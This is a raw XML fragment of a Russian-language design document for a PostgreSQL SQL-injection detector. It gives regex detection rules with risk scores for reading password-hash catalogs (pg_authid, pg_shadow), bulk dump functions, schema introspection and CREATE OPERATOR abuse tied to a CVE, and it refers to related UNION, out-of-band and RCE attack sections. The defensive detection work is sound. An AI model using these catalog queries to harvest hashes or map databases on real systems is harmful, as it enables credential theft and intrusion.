        <w:t xml:space="preserve">Сводный regex по всем шести подразделам 3.8. Три ветки с разным базовым риском:</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METADATA_RECON = "metadata_recon"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VulnerabilityClass.METADATA_RECON: 7,</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"meta_recon_high": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\b(pg_authid|pg_shadow)\b",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"meta_recon_mid": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\b(pg_proc|pg_get_functiondef|pg_get_function_arguments|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"query_to_xml|table_to_xml|database_to_xml|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"query_to_xmlschema|table_to_xmlschema|database_to_xmlschema|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"pg_stats|pg_stats_ext|pg_statistic|pg_statistic_ext|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"most_common_vals|histogram_bounds)\b",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"meta_recon_low": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\b(pg_class|pg_namespace|pg_attribute|pg_index|pg_constraint|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"pg_roles|pg_settings|pg_extension|pg_available_extensions|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"information_schema\.(tables|columns|routines)|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"current_setting|version\(\))\b",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"meta_recon_custom_op": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bCREATE\s+OPERATOR\b",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if _RE["meta_recon_high"].search(sql):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vulnerability_class=VulnerabilityClass.METADATA_RECON,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=10,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Запрос обращается к pg_authid / pg_shadow — хешам паролей. "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "Доступ требует SUPERUSER; в application-коде нет легитимных use case.",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Удалите чтение pg_authid. Для дампа ролей используйте pg_roles.",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elif _RE["meta_recon_mid"].search(sql):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vulnerability_class=VulnerabilityClass.METADATA_RECON,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=8,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Запрос читает pg_proc / pg_stats / query_to_xml / "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "массовые дамп-функции — паттерн разведки структуры или "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "утечки через optimizer statistics.",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="В application-коде эти каталоги/функции не нужны. "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "Для интроспекции используйте отдельную монитор-роль.",</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elif _RE["meta_recon_low"].search(sql):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vulnerability_class=VulnerabilityClass.METADATA_RECON,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=4,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Запрос обращается к pg_catalog / information_schema — "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "признак интроспекции схемы. Часто легитимно (ORM, миграции), "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "но в комбинации с конкатенацией строк — индикатор recon.",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Если это runtime-запрос приложения — вынесите интроспекцию "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "в один раз при старте; в runtime читать каталоги не нужно.",</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_RE["meta_recon_custom_op"].search(sql):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vulnerability_class=VulnerabilityClass.METADATA_RECON,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=9,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="CREATE OPERATOR в application-сессии — возможный паттерн "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "эксплуатации CVE-2025-8713 (обход view ACL / RLS через "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "custom operator в selectivity-оценщике).",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Удалите CREATE OPERATOR; операторы создаются только при "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "установке расширений DBA-ролью.",</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Градация risk обоснована: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 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (post-exploitation после superuser; в application нет use case).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table_to_xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (узкие легитимные use case в application, чаще атака).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version()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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (массово используются ORM/миграциями; сигнал в комбинации с другими маркерами SQL_INJECTION_CLASSIC). Решение об эскалации до критичной находки — оставить LLM-судье по совокупности.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OPERATOR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (отдельная ветка, потому что это активное действие, а не чтение каталога).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Порядок проверки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">high → mid → low</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elif</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> гарантирует, что для запроса вида </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM pg_authid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> сработает только high-ветка (риск 10), а не каскад из трёх finding-ов на одну строку.</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R17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-2024-4317 утечка через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PostgreSQL advisory, pganalyze (5-минутный разбор), документация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Критичный нюанс —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обязателен после бинар-патча, особенно на managed-провайдерах, где автоматическое применение скрипта не гарантировано.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R26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-2025-8713 обход ACL/RLS через custom operator в selectivity-оценщике: PostgreSQL advisory, GBHackers (август 2025). Полная цепочка — в 4.5.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Общие:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PortSwigger Web Security Academy (SQLi cheat sheet, PostgreSQL section, fingerprinting + enumeration), HackTricks PostgreSQL Injection (general enumeration), PostgreSQL Docs (System Catalogs, System Views, System Information Functions, XML Functions, Predefined Roles), RFC 5802 (SCRAM для 3.8.3), hashcat documentation (hash modes 12 и 28600).</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3.1.x (UNION-based)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.8.1/3.8.2 дают входные данные для 3.1: имена таблиц, колонок, типы. Без 3.8.1 атакующий не знает, что выбирать в UNION.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 (OOB)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.8.4 Payload C показывает, какие OOB-каналы открыты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Без этого знания 3.6 — попытка вслепую.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 (RCE)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.8.4 Payload C показывает, доступны ли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plsh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для языковых RCE из 3.7.2/3.7.3.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3.10.1 (data-modifying CTE)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
